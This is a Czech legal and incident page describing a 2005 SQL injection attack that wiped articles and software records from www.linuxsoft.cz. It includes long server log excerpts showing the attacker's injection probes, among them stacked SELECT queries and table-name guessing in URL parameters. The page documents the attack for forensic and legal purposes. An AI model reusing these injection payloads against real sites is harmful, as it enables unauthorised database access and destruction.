zakony-online.cz

Computer attack

On 5 December 2005 the Linux server www.linuxsoft.cz was attacked by an unknown attacker who, by exploiting a flaw in the website's code (SQL injection), deleted several hundred technical articles and 10,000 software records from the public site.
See the discussion of this case.
The server logs revealed the IP addresses from which the attacker connected, including one belonging to an ADSL connection from Bluetone (České radiokomunikace).
We are preparing a criminal complaint against an unknown perpetrator, probably for a violation of Section 149 of the Criminal Code:

Whoever, by conduct that is contrary to the regulations governing competition in economic relations or to the customs of competition, damages the good reputation of a competitor's business or endangers its operation or development shall be punished by imprisonment for up to one year, or by a fine, or by forfeiture of property.

The description of the case is still being worked on; it will certainly be very interesting to follow how the Police of the Czech Republic proceed in investigating a computer crime case.


Report on the security incident of 5 December 2005, www.linuxsoft.cz

Introduction

On Monday, 5 December 2005, an attacker manipulated, without authorization, database tables that are essential to the correct operation of the website. Their modification left the site practically unusable, and the situation required an immediate response.

Findings

At around 4 p.m. the website www.linuxsoft.cz[1] was damaged; only the discussion forums kept working, and that is where the attacker posted his announcement of the exploitation. After a few tens of minutes work on the situation began: the system logs were backed up and the programmer started analysing the problem. The web server logs revealed an attack of the "SQL injection(*)" type through one of the unsecured PHP scripts; the flaw was fixed and the database was restored.

The attack and the traces found

On 5 December at 13:12:56 someone accessed a page generated by the unsecured script from a webmail client (which probably means that someone else pointed the attacker to the unsecured page).

84.244.83.151 - - [05/Dec/2005:13:12:56 +0100] "GET /script_list.php?id_kategory=157a HTTP/1.1" 200 54648 "http://mail.google.com/mail/?&ik=a3f28d5cef&view=cv&search=inbox&th=107dd15405971c4f&lvp=-1&cvp=1&qt=&qt=&zx=7hhonz-9hrr01" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.2) Gecko/20040906"

About 20 minutes later the attack itself began, again from an IP address (which by all appearances also belongs to Bluetone), and once the weakness had been found, almost the entire site was searched for similar problems.

212.158.128.159 - - [05/Dec/2005:13:29:05 +0100] "GET /script_list.php?id_kategory=157a HTTP/1.0" 200 54606 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:29:39 +0100] "GET /script_list.php?id_kategory=(SELECT%20157) HTTP/1.0" 200 59123 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:29:50 +0100] "GET /script_list.php?id_kategory=(SELECT%20157a) HTTP/1.0" 200 54626 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:31:25 +0100] "GET /script_list.php?id_kategory=(SELECT%20157a) HTTP/1.0" 200 54626 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:31:41 +0100] "GET /script_list.php?id_kategory=157;%20SELECT%20157 HTTP/1.0" 200 54628 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:32:37 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:54:34 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:55:43 +0100] "GET /prispevek_edit.php?predek=0&id_vazba=3232&type_item=7 HTTP/1.0" 200 54100 "http://www.linuxsoft.cz/script_list.php?id_kategory=157));%20SELECT%20157%20WHERE%201=((1" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:55:58 +0100] "GET /prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7 HTTP/1.0" 200 54100 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:12 +0100] "GET /prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7e HTTP/1.0" 200 54100 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:27 +0100] "POST /login.php HTTP/1.0" 302 0 "http://www.linuxsoft.cz/prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:30 +0100] "GET /error.php?error=3 HTTP/1.0" 200 54731 "http://www.linuxsoft.cz/prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:43 +0100] "POST /login.php HTTP/1.0" 302 0 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:45 +0100] "GET /error.php?error=3 HTTP/1.0" 200 54731 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:59 +0100] "GET /zapomenka.php?vorgotten_email=ovlach%40nanobyte.cz&tlacbitko=Odeslat HTTP/1.0" 302 0 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:08 +0100] "GET /error.php?error=8 HTTP/1.0" 200 54135 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:16 +0100] "GET /error.php?error=8e HTTP/1.0" 200 53805 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:38 +0100] "GET /shop/?sestava=2 HTTP/1.0" 200 8074 "http://www.linuxsoft.cz/error.php?error=8e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:39 +0100] "GET /shop/img/onstock_yes.gif HTTP/1.0" 200 152 "http://www.linuxsoft.cz/shop/?sestava=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:39 +0100] "GET /shop/img/onstock_no.gif HTTP/1.0" 200 1062 "http://www.linuxsoft.cz/shop/?sestava=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:44 +0100] "GET /shop/?sestava=2e HTTP/1.0" 200 5756 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:52 +0100] "GET /shop/?sestava=2 HTTP/1.0" 200 8074 "http://www.linuxsoft.cz/shop/?sestava=2e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:58 +0100] "GET /shop/?produkt=3956 HTTP/1.0" 200 7761 "http://www.linuxsoft.cz/shop/?sestava=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:02 +0100] "GET /shop/img/3956.jpg HTTP/1.0" 200 7631 "http://www.linuxsoft.cz/shop/?produkt=3956" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/?produkt=3956z HTTP/1.0" 200 18817 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/amd2.jpeg HTTP/1.0" 200 2633 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/ram2.jpeg HTTP/1.0" 200 1709 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/mb2.jpeg HTTP/1.0" 200 4623 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/case2.jpeg HTTP/1.0" 200 1936 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/hdd2.jpeg HTTP/1.0" 200 2636 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/matrox2.jpeg HTTP/1.0" 200 3349 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/lcd2.jpeg HTTP/1.0" 200 2387 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/acernew.jpeg HTTP/1.0" 200 2304 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/pda2.jpeg HTTP/1.0" 200 2425 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/projektory.jpeg HTTP/1.0" 200 2184 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/hp2.jpeg HTTP/1.0" 200 2145 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/digi2.jpeg HTTP/1.0" 200 2044 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/faxnew.jpeg HTTP/1.0" 200 1940 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/sun2.jpg HTTP/1.0" 200 2198 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/suse.png HTTP/1.0" 404 322 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/knoppix.png HTTP/1.0" 200 4205 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/key2.jpeg HTTP/1.0" 200 2080 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/repro2.jpeg HTTP/1.0" 200 2196 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/dvdnew.jpg HTTP/1.0" 200 1773 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/dvd2.jpeg HTTP/1.0" 200 2165 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/mp32.jpeg HTTP/1.0" 200 1857 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/cd2.jpeg HTTP/1.0" 200 3158 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:18 +0100] "GET /shop/?produkt=3956'%22e HTTP/1.0" 200 18817 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET / HTTP/1.0" 200 71629 "http://www.linuxsoft.cz/shop/?produkt=3956'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/banner_linuxsoft_kurzy.gif HTTP/1.0" 200 11689 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/sipka1.png HTTP/1.0" 200 163 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/archlinux/archlinux_logo.png HTTP/1.0" 200 3774 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/emulators_2/commodore_logo.png HTTP/1.0" 200 1869 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/notebook/icon_ntbk.png HTTP/1.0" 200 2117 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/rr4/rr4_logo.png HTTP/1.0" 200 2178 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:37 +0100] "GET /css/article.css HTTP/1.0" 200 412 "http://www.linuxsoft.cz/article.php?id_article=1029" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:40 +0100] "GET /article.php?id_article=1029 HTTP/1.0" 200 80250 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:41 +0100] "GET /img/banner_liberix2.gif HTTP/1.0" 200 30422 "http://www.linuxsoft.cz/article.php?id_article=1029" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:51 +0100] "GET /article.php?id_article=1029w HTTP/1.0" 200 54524 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:53 +0100] "GET /img/plc-468x60-ban-anim-2.gif HTTP/1.0" 200 15261 "http://www.linuxsoft.cz/article.php?id_article=1029w" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:02 +0100] "GET /article.php?id_article=1029w'%22 HTTP/1.0" 200 54485 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:07 +0100] "GET /img/banner_468x60.gif HTTP/1.0" 200 39517 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:10 +0100] "GET /article.php?id_article=1029w'%22e HTTP/1.0" 200 54699 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:11 +0100] "GET /img/bsod6_468x60.en.gif HTTP/1.0" 200 5198 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:21 +0100] "POST /login.php HTTP/1.0" 302 0 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:24 +0100] "GET /error.php?error=3 HTTP/1.0" 200 54916 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:36 +0100] "GET /sw_list.php?id_kategory=120 HTTP/1.0" 200 60260 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:40 +0100] "GET /sw_list.php?id_kategory=120e HTTP/1.0" 200 60260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:00:22 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20users) HTTP/1.0" 200 54902 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:00:41 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20users%20LIMIT%201) HTTP/1.0" 200 54239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:00 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20articles%20LIMIT%201) HTTP/1.0" 200 54812 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:18 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20items%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:36 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20shop%20LIMIT%201) HTTP/1.0" 200 54788 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:54 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20shop_items%20LIMIT%201) HTTP/1.0" 200 54824 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:02:13 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20sestavy%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:02:26 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20sestava%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:02:53 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20kurzy%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:05 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20sw%20LIMIT%201) HTTP/1.0" 200 54776 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:21 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20clanky%20LIMIT%201) HTTP/1.0" 200 54800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:48 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20clanek%20LIMIT%201) HTTP/1.0" 200 54800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:57 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20articles%20LIMIT%201) HTTP/1.0" 200 54812 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:04:09 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:04:46 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20menu%20LIMIT%201) HTTP/1.0" 200 54788 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:05:04 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20directory%20LIMIT%201) HTTP/1.0" 200 54818 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:05:20 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20templates%20LIMIT%201) HTTP/1.0" 200 54818 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:05:51 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20news%20LIMIT%201) HTTP/1.0" 200 54788 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:06:09 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20novinky%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:06:36 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20linux_news%20LIMIT%201) HTTP/1.0" 200 54824 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:06:57 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20produkty%20LIMIT%201) HTTP/1.0" 200 54812 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:07:27 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20facts%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:07:40 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20fakta%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:08:08 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20distros%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:24:20 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57422 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:27:17 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=(1 HTTP/1.0" 200 54898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:27:37 +0100] "GET /script_list.php?id_kategory=157e HTTP/1.0" 200 54792 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:27:49 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=(1 HTTP/1.0" 200 54898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:28:06 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57422 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:34:19 +0100] "GET /img/dds-468x60.gif HTTP/1.0" 200 7127 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:34:20 +0100] "GET / HTTP/1.0" 200 71794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:34:32 +0100] "GET /sw_list.php?id_kategory=6 HTTP/1.0" 200 66184 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:36:14 +0100] "GET /script_list.php?id_kategory=156 HTTP/1.0" 200 56191 "http://www.linuxsoft.cz/sw_list.php?id_kategory=6" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
